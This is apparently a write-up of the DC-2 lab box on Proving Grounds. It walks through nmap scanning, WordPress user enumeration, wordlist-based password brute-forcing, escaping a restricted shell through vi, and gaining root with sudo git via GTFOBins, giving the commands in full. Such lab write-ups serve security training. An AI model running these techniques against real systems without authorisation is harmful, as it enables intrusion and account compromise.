Proving Grounds: DC-2 Walkthrough

DC-2 machine involved initial reconnaissance with Nmap, WordPress user enumeration, custom wordlist generation, password cracking, escaping a restricted shell, privilege escalation via sudo misconfiguration, and using GTFOBins to achieve root access. This engagement highlighted the importance of proper user and privilege management in securing systems.

Let’s start with first things first. Let’s start the nmap scan to see what ports and services are running on the system.

nmap -A -sC -sV 192.168.210.194 -oN initialDC-2 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-04 06:54 EDT
Nmap scan report for dc-2 (192.168.210.194)
Host is up (0.15s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: DC-2 – Just another WordPress site
|_http-server-header: Apache/2.4.10 (Debian)
|_http-generator: WordPress 4.7.10

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.37 seconds

We got only one port from the initial scan, Let’s dig deeper to scan all ports.

Nmap scan report for dc-2 (192.168.210.194)
Host is up (0.15s latency).
Not shown: 56330 closed tcp ports (conn-refused), 9203 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.07 seconds

Now we have 2 ports running on the box, 80 HTTP and 7744 SSH. Let’s enumerate the http port as nmap shown us the name of the site let’s add that to our host file.

echo "192.168.210.194  dc-2" >> /etc/hosts

The Flag option on the webpage clearly got our attention. Let’s check what hint it has for us. So from this page, we got a really good hint to move ahead.

So, the first idea that came to us was to run a wpscan on the webpage and see what the scan enumerates.

wpscan --url http://dc-2 --enumerate p --enumerate t --enumerate u


[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

I found three user names: admin, jerry and Tom and as said above we need to use cewl which is used for generating a dictionary by spidering website.

Therefore, we have used cewl to build a wordlist for passwords from inside //dc-2 as shown in the image.

Time to fire up wpscan with our username & password list to valid user login combination.

wpscan --url //dc-2 -U users -P password

[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

We got the passwords of two users , I have tried these and logged on successfully after enumerating the website I have found that I have to try another endpoint to get the initial access of the machine.

Another endpoint is ssh which is open on 7744 port, Let’s try to login with the credentials we have obtained.

ssh tom@192.168.210.194 -p 7744  
tom@192.168.210.194's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Aug  4 08:18:55 2023 from 192.168.45.173
tom@DC-2:~$ ls /u-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a2': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a0': invalid number specifier

ls: cannot access /u: No such file or directory

We get in, But we got a restricted shell. Let’s check the PATH.

tom@DC-2:~$ echo $PATH
/home/tom/usr/bin

tom@DC-2:~$ ls /home/tom/usr/bin
less  ls  scp  vi

So we got vi now let’s use vi to get an unrestricted shell. So we use commands as follows.

tom@DC-2:~$ vi
Then in vi

:set shell=/bin/bash
:shell
:q

After escaping the restricted shell, we export “/bin/bash” as our SHELL environment variable and “/usr/bin” as our PATH environment variable so that we can run Linux commands properly.

export PATH=/bin:/usr/bin:$PATH 
export SHELL=/bin/bash:$SHELL

After that we can get the user flag and see the flag3.txt for the next hint.

According to hint, now we need to switch user from tom to jerry but we don’t have jerry’s login credential. Then checked the sudoers list and found that tom can run “/usr/bin/git” as root without a password.

And the we can absue git in multiple ways to get root on the machine!

https://gtfobins.github.io/gtfobins/git/

I used the following commands to get root.

sudo git -p help config
!/bin/bash

And boom we are root on the machine.

Stay tuned for next writeup :)